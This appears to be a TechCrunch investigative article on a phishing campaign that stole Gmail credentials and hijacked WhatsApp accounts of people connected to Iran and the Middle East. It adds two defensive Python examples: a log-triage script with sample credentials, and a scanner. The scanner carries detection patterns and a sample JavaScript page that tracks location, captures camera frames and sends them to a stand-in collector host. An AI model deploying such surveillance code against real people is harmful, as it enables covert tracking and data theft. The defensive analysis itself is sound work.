How a hacking campaign targeted prominent Gmail and WhatsApp users across the Middle East


On Tuesday, Nariman Gharib, an Iranian activist based in the United Kingdom, tweeted redacted screenshots of a phishing link that had been sent to him in a WhatsApp message.

“Do not click on suspicious links,” Gharib warned. The activist, who follows the digital side of Iranian protests from afar, said the campaign targeted people involved in Iran-related activities, like himself.

This hacking campaign comes as Iran endures the longest nationwide internet outage in its history, while anti-government protests, and violent crackdowns, rage across the country. Given that Iran and its closest adversaries are very active in offensive cyberspace (read: hacking people), we wanted to learn more.

Gharib shared the full phishing link with TechCrunch shortly after publishing it, allowing us to capture a copy of the source code of the phishing webpage used in the attack. He also shared his own findings in writing.

TechCrunch analyzed the source code of the phishing page and, with additional input from security researchers, we believe the campaign aims to steal Gmail and other online credentials, hijack WhatsApp accounts, and conduct surveillance by collecting location data, photos, and audio recordings from victims' devices.

However, it is unclear whether the hackers were government-linked agents, spies, or cybercriminals — or all three.

TechCrunch also identified a way to view a real-time copy of all victims’ responses saved on the attacker’s server, which were left exposed and accessible without a password. This data revealed dozens of victims who had inadvertently entered their credentials into the phishing site and were likely later hacked.

The list includes a Middle Eastern academic working in national security studies; the head of an Israeli drone maker; a senior minister in the Lebanese government; at least one journalist; and people in the United States or with US phone numbers.

TechCrunch is publishing our findings after verifying a significant portion of Gharib's report. The phishing site is now down.

Inside the attack chain

According to Gharib, the WhatsApp message he received contained a suspicious link, which loaded a phishing website in the victim's browser.

Two side-by-side screenshots of a WhatsApp message, showing a malicious link to whatsapp-meeting.duckdns.org.
Image credits: Nariman Gharib

The link shows that the attackers relied on a dynamic DNS provider called DuckDNS for their phishing campaign. Dynamic DNS providers let people point an easy-to-remember web address, in this case a duckdns.org subdomain, at a server whose IP address may change frequently.

It's not clear whether the attackers took the phishing site down themselves, or were caught and cut off by DuckDNS. We reached out to DuckDNS to inquire, but owner Richard Harper asked us to submit an abuse report instead.

From what we understand, the attackers used DuckDNS to hide the real location of the phishing page and to make the link look like a genuine WhatsApp link.

The phishing page itself was hosted on alex-fabow.online, a domain first registered in early November 2025. Several other related domains were hosted on the same dedicated server, and their names follow a pattern suggesting the campaign also impersonated other virtual meeting room providers, with domains such as meet-safe.online and whats-login.online.

We're not sure what happens while the DuckDNS link loads in a victim's browser, or how the link selects the specific phishing page to load. It is possible that the DuckDNS link redirects the target to a particular phishing page based on information it captures from the user's device.

The phishing page would not load in our web browser, preventing us from interacting with it directly. However, reading the page's source code allowed us to better understand how the attack worked.

Phishing for Gmail credentials and phone number

Depending on the target, clicking the phishing link opens either a fake Gmail login page or a prompt for the target's phone number, starting an attack flow aimed at stealing their password and two-factor authentication code.

But the phishing page’s source code had at least one flaw: TechCrunch found that by modifying the phishing page’s URL in our web browser, we could view a file on the attacker’s servers that was storing logs of each victim who entered their credentials.

The file contained more than 850 records of information provided by victims during the attack flow. The logs detail which stage of the phishing flow each victim reached. This included copies of the usernames and passwords that victims entered on the phishing page, as well as invalid entries and their two-factor codes, so the log effectively acted as a keystroke logger.

The logs also included each victim's user agent, a string of text identifying the operating system and browser version used to view a website. This data shows that the campaign was designed to target Windows, macOS, iPhone, and Android users.

The exposed file allowed us to follow the attack flow step by step for each victim. In one case, the file shows the victim clicking the malicious link, which opened a page resembling a Gmail login window. The log then shows the victim entering his email credentials several times until he typed the correct password.

The records then show the same victim entering a two-factor authentication code that had been sent to him by text message. We can tell because Google sends its SMS two-factor codes in a recognizable format (typically G-xxxxxx, a six-digit numeric code prefixed with "G-").
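The exposed log let TechCrunch reconstruct each victim's path through the phishing flow and spot Google-format SMS codes. The script below is an added example of how an analyst might triage such a file; it is not TechCrunch's tooling or the phishing kit's code. The log format (one JSON object per line with a victim identifier, the stage reached, the value typed and the user agent) and the sample records are assumptions constructed for this example, since the article does not reproduce the real file.

```python
import json
import re
from collections import defaultdict

# Google delivers SMS verification codes as "G-" followed by six digits, e.g. "G-123456".
# The anchors stop longer strings such as passwords from matching.
GOOGLE_SMS_CODE = re.compile(r"^G-\d{6}$")
SIX_DIGITS = re.compile(r"^\d{6}$")

# Constructed sample log (assumed format: one JSON object per line). The last line
# is deliberately malformed to show that a damaged record does not stop triage.
SAMPLE_LOG = """\
{"victim": "v1", "stage": "email", "value": "target@example.com", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"}
{"victim": "v1", "stage": "password", "value": "Winter2024", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"}
{"victim": "v1", "stage": "password", "value": "Winter2024!", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"}
{"victim": "v1", "stage": "2fa", "value": "G-482913", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"}
{"victim": "v2", "stage": "phone", "value": "+1 555 0100", "ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Safari/604.1"}
{"victim": "v2", "stage": "2fa", "value": "713204", "ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Safari/604.1"}
{"victim": "v3", "stage": "email", "value": "someone@example.org", "ua": "Mozilla/5.0 (Linux; Android 14) Chrome/120.0"}
not json at all
"""


def platform_from_ua(ua):
    """Coarse platform from a user-agent string. iPhone is tested before macOS
    because iOS user agents also contain 'Mac OS X'; Android before the
    generic Linux token for the same reason."""
    if "iPhone" in ua or "iPad" in ua:
        return "iPhone"
    if "Android" in ua:
        return "Android"
    if "Windows" in ua:
        return "Windows"
    if "Mac OS X" in ua or "Macintosh" in ua:
        return "macOS"
    return "other"


def classify_code(value):
    """Distinguish a Google SMS code from a bare six-digit code (which could be
    any provider's SMS or TOTP code) from anything else."""
    if GOOGLE_SMS_CODE.match(value):
        return "google-sms"
    if SIX_DIGITS.match(value):
        return "six-digit"
    return None


def parse_log(text):
    """Group records by victim, skipping lines that are not well-formed JSON."""
    by_victim = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        by_victim[rec["victim"]].append(rec)
    return by_victim


def summarize(by_victim):
    """Per-victim reconstruction of how far the phishing flow got."""
    summary = {}
    for victim, recs in by_victim.items():
        stages = [r["stage"] for r in recs]
        passwords = [r["value"] for r in recs if r["stage"] == "password"]
        codes = [classify_code(r["value"]) for r in recs if r["stage"] == "2fa"]
        summary[victim] = {
            "platform": platform_from_ua(recs[0].get("ua", "")),
            "stages": stages,
            "password_attempts": len(passwords),
            # The kit keeps every attempt; the last one is the one that worked.
            "last_password": passwords[-1] if passwords else None,
            "google_sms_code": "google-sms" in codes,
            "any_2fa_code": any(codes),
            # A code entered after a password (Gmail flow) or after a phone number
            # (code-based login) means the account was very likely taken over.
            "likely_compromised": any(codes) and (bool(passwords) or "phone" in stages),
        }
    return summary


def triage(text=SAMPLE_LOG):
    return summarize(parse_log(text))


if __name__ == "__main__":
    for victim, info in triage().items():
        print(victim, info)
```

Victims who typed a bare six-digit code rather than the G- form are reported separately, since the prefix alone is what ties a code to Google's SMS channel; a plain six digits could belong to any service's login flow.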

Hijacking WhatsApp and extracting browser data

Beyond stealing credentials, this campaign also appears to enable surveillance by tricking victims into sharing their location, voice, and photos from their devices.

In Gharib's case, clicking the link in the phishing message opened a fake WhatsApp-themed page in his browser, displaying a QR code. The lure is intended to trick the target into scanning the code with their device, ostensibly to gain access to a virtual meeting room.

A collection of exposed logs from the attacker's server, showing sets of attack flow data such as logins and passwords entered on a phishing page.
Image credits: TechCrunch

Gharib said the QR code was generated by the attacker, and scanning or tapping it would instantly link the victim's WhatsApp account to a device controlled by the attacker, giving the attacker access to the victim's data. This technique, which abuses WhatsApp's linked-device feature, has long been known, and the same approach has been used to target users of the Signal messaging app.

We asked Runa Sandvik, founder of Granitt and a security researcher who helps at-risk individuals with their security, to examine a copy of the phishing page's code and explain how it worked.

Sandvik found that when the page loads, its code triggers a browser prompt asking the user for permission to access their location (via navigator.geolocation), as well as their camera and microphone (via navigator.getUserMedia).

If the user agrees, the browser immediately sends the person's coordinates to the attacker, who can then pinpoint the victim's location. The page then keeps sending the victim's location every few seconds for as long as it remains open.

The code also let the attackers record short bursts of audio and take photos every three to five seconds using the device's camera. However, we did not see any location, audio, or image data collected on the server.
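When a phishing page cannot be loaded safely, as was the case here, its saved source can still be triaged statically for the behaviours Sandvik described: permission prompts for location and media, a timer driving repeated captures, and a channel to send the results out. The scanner below is an added example of that kind of check; it is not the phishing kit's code and not anything TechCrunch or Sandvik published. The indicator names, the collector URL and the sample page are constructed for this example (the real kit's handling of the DuckDNS hop is unknown, and the `whatsapp-meeting.duckdns.org` host is the one from Gharib's screenshot). The media pattern matches both the legacy `navigator.getUserMedia` named above and the current `navigator.mediaDevices.getUserMedia`, since kits use either.

```python
import re

# Indicator patterns for the behaviours described above. The names are this
# example's own; they are not taken from the phishing kit.
INDICATORS = {
    "geolocation": re.compile(r"navigator\.geolocation\.(?:getCurrentPosition|watchPosition)"),
    "camera-or-mic": re.compile(r"(?:navigator\.(?:mediaDevices\.)?getUserMedia|\bMediaRecorder\b)"),
    "periodic-capture": re.compile(r"\bsetInterval\s*\("),
    "canvas-snapshot": re.compile(r"\.(?:toDataURL|toBlob)\s*\("),
    "exfiltration": re.compile(r"(?:\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+WebSocket\s*\()"),
}

# duckdns.org is the provider seen in this campaign; the other suffixes are an
# assumed, illustrative list of common dynamic-DNS providers.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "ddns.net", "no-ip.org", "hopto.org")

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")

# Constructed stand-in for a surveillance page: it watches the position, grabs a
# camera frame every four seconds and posts everything to a hypothetical collector.
SAMPLE_PAGE = r"""
<html><body><div id="qr"></div>
<script>
  const lure = "https://whatsapp-meeting.duckdns.org/";
  const sink = "https://collector.example/collect";
  function send(kind, payload) {
    fetch(sink, {method: "POST", body: JSON.stringify({kind, payload})});
  }
  navigator.geolocation.watchPosition(p => send("geo", [p.coords.latitude, p.coords.longitude]));
  navigator.mediaDevices.getUserMedia({video: true, audio: true}).then(stream => {
    const video = document.createElement("video"); video.srcObject = stream; video.play();
    const canvas = document.createElement("canvas");
    setInterval(() => {
      canvas.getContext("2d").drawImage(video, 0, 0);
      send("photo", canvas.toDataURL("image/jpeg"));
    }, 4000);
  });
</script></body></html>
"""

# Constructed control: a plain login form with no scripting at all.
BENIGN_PAGE = '<html><body><form action="/login"><input name="u"><input name="p"></form></body></html>'


def hostname(url):
    """Host part of a URL, without scheme, port or path."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0].lower()


def scan_page(src):
    """Return which indicators fire, every literal URL, any dynamic-DNS hosts and a verdict."""
    hits = [name for name, pat in INDICATORS.items() if pat.search(src)]
    urls = sorted(set(URL_RE.findall(src)))
    dyn = sorted({hostname(u) for u in urls if hostname(u).endswith(DYNAMIC_DNS_SUFFIXES)})
    collects = {"geolocation", "camera-or-mic"} & set(hits)
    if collects and "exfiltration" in hits:
        verdict = "surveillance"        # asks for sensors AND has somewhere to send them
    elif collects:
        verdict = "permission-request-only"
    else:
        verdict = "no-surveillance-indicators"
    return {"indicators": hits, "urls": urls, "dynamic_dns_hosts": dyn, "verdict": verdict}


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, scan_page(page))
```

A hit on the sensor APIs alone is not proof of surveillance, since legitimate meeting pages request the camera too; the combination with a timer, a canvas snapshot and an outbound channel is what matches the behaviour Sandvik found. Obfuscated kits will evade string matching, so treat a clean result as "nothing obvious", not as a clean bill of health.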

Thoughts on victims, timing, and attribution

We do not know who is behind this campaign. What is clear is that it succeeded in stealing credentials from victims, and it is possible that the phishing campaign will resurface.

Although the identities of some of the targeted victims are known, we do not have enough information to understand the nature of the campaign. The number of victims we know to have been compromised is fairly low, fewer than 50 individuals, and includes ordinary people in the Kurdish community, as well as academics, government officials, business leaders and other high-profile figures across the wider Iranian diaspora and the Middle East.

The true number of victims may be much higher than we know, and a fuller picture of who was targeted might help explain why.

The case that this could be a government-backed actor

It is unclear what motivated the hackers to steal people's credentials and hijack their WhatsApp accounts; knowing that would also help determine who is behind this hacking campaign.

For example, a government-backed group might want to steal the email password and two-factor codes of a high-value target, such as a politician or journalist, so that it can download private and confidential information.

This would make sense, since Iran is currently completely isolated from the outside world, and getting information into or out of the country is a challenge. It is plausible that the Iranian government, or any foreign government with interests in Iranian affairs, would want to know who influential individuals associated with Iran are communicating with, and about what.

As such, the timing of this phishing campaign and who it appears to target could indicate an espionage campaign aimed at gathering information about a narrow list of people.

We asked Gary Miller, a security researcher at Citizen Lab and a mobile surveillance expert, to review the phishing code and some of the data exposed on the attacker's server.

Miller said the attack "certainly bears the hallmarks of a phishing campaign linked to the Iranian Revolutionary Guard," referring to highly targeted email breaches carried out by Iran's Islamic Revolutionary Guard Corps, a branch of the Iranian military known for conducting cyberattacks. Miller pointed to a mix of indicators, including the international scope of the targeting, credential theft, the abuse of popular messaging platforms like WhatsApp, and the social engineering techniques used in the phishing link.

The case that this could be a financially motivated actor

On the other hand, a financially motivated hacker could use the same stolen Gmail password and two-factor code of a different kind of high-value target, such as a company executive, to steal private, sensitive business information from their inbox. The hacker could also force password resets on the victim's cryptocurrency and bank accounts to empty them.

However, the campaign's focus on accessing the victim's location and device media is unusual for a financially motivated actor, who would have little regular use for photos and audio recordings.

We asked Ian Campbell, a threat researcher at DomainTools who analyzes public internet records, to look at the domain names used in the campaign to establish when they were first set up, and whether they are connected to any other known or previously identified infrastructure.

Campbell found that although the campaign targeted victims amid the ongoing nationwide protests in Iran, its infrastructure had been in place for weeks. He added that most of the domains associated with the campaign were registered in early November 2025, and one related domain was created months earlier, in August 2025. Campbell described the domains as moderate to high risk, and said they appeared to be linked to a financially motivated cybercrime operation.

A complicating factor is that the Iranian government has been known to outsource cyberattacks to criminal hacking groups, perhaps to obscure its own involvement in hacking operations against its own citizens. The US Treasury has in the past sanctioned Iranian companies for acting as fronts for the IRGC and carrying out cyberattacks, including targeted phishing and social engineering attacks.

As Miller notes, “This drives home the point that clicking on spam WhatsApp links, no matter how convincing, is a high-risk and unsafe practice.”

To communicate securely with this reporter, you can contact him using the Signal app via the username: zackwhittaker.1337

Lorenzo Franceschi-Bicchirai contributed reporting.
